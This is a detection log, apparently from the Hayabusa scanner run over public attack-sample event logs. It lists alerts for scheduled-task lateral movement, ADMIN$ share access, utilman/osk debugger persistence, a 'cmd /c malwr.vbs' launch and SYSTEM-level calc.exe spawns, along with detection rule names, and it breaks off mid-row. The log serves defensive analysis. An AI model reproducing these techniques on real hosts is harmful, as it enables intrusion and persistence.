+09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx -2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 
-2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.508 
+09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 56034 : LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : 
User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 
Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.909 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 
+09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.514 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: 
C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT 
